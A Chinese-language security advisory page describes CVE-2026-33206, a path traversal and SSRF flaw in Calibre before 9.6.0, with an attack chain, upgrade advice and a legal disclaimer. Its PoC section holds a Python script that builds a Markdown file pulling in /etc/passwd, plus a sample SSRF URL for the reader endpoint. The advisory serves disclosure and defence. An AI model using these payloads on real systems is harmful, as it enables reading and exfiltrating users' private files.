IPBUF安全漏洞报告
English
CVE-2026-33206 CVSS 6.3 中危

CVE-2026-33206 Calibre路径遍历与文件泄露漏洞

披露日期: 2026-03-27
来源: [email protected]

漏洞信息

漏洞编号
CVE-2026-33206
漏洞类型
路径遍历
CVSS评分
6.3 中危
攻击向量
本地 (AV:L)
认证要求
无需认证 (PR:N)
用户交互
需要交互 (UI:R)
影响产品
Calibre

相关标签

路径遍历SSRF信息泄露CalibreCVE-2026-33206

漏洞概述

Calibre 9.6.0 之前版本存在路径遍历漏洞,攻击者可利用 Markdown 文件中的图像处理机制包含任意文件。结合电子书阅读器 Web 视图中背景图片端点的认证缺失和 SSRF 漏洞,攻击者可无需额外交互即外泄系统文件。

技术细节

该漏洞源于 Calibre 处理 Markdown 等文本文件时的图像路径解析逻辑缺陷。攻击者可构造包含路径遍历序列(如 ../)的恶意 Markdown 文件,当 Calibre 将其转换为电子书时,会将目标系统上的任意文件(如 /etc/passwd)嵌入到电子书内容中。此外,阅读器的 Web 视图在处理背景图片时未进行严格的身份验证,且存在服务端请求伪造(SSRF),允许攻击者通过特定的 URL 请求触发服务器加载本地文件,并将包含敏感数据的响应发送给攻击者控制的服务器,从而实现文件外泄。

攻击链分析

STEP 1
步骤1:构造恶意文件
攻击者创建包含路径遍历序列(例如 ../../../../etc/passwd)的 Markdown 文件,利用图像嵌入语法指向系统敏感文件。
STEP 2
步骤2:触发文件包含
当用户使用 Calibre 打开或转换该恶意文件时,由于漏洞存在,Calibre 会读取路径遍历指向的任意文件并将其内容嵌入到电子书数据中。
STEP 3
步骤3:利用SSRF外泄数据
攻击者利用阅读器 Web 视图中缺乏认证的背景图片端点(SSRF漏洞),访问包含恶意数据的资源,将读取到的敏感文件内容发送至攻击者控制的外部服务器。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import os # PoC for CVE-2026-33206: Path Traversal in Calibre # This script demonstrates how a malicious markdown file can be created # to include arbitrary files via path traversal. def create_exploit_md(output_path, target_file): """ Creates a markdown file that attempts to include a local file. """ # Using path traversal sequence to escape the ebook context payload = f"![Image](../../..{target_file})" with open(output_path, 'w') as f: f.write(f"# Exploit PoC\n\n{payload}\n") print(f"[+] Exploit Markdown file created at: {output_path}") print(f"[+] Target file for inclusion: {target_file}") # Example usage # Attacker aims to read /etc/passwd on the victim's machine create_exploit_md("exploit.md", "/etc/passwd") # Note: The second part involves the Content Server / Web View. # An attacker would need to host this markdown, convert it, and then # use the SSRF in the background-image endpoint to exfiltrate data. # Example SSRF payload for the background endpoint: # url = "http://localhost:8080/reader?background=../../../../etc/passwd"

影响范围

Calibre < 9.6.0

防御指南

临时缓解措施
建议用户立即更新至官方发布的最新版本(9.6.0及以上)。在未更新前,应谨慎处理来源不明的电子书文件,并关闭 Calibre 的内容服务器功能以防止远程利用。

参考链接

法律声明

以上信息仅供安全研究和授权渗透测试使用。未经授权对他人系统进行测试属于违法行为。利用本报告内容进行非法活动者,后果自负。

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表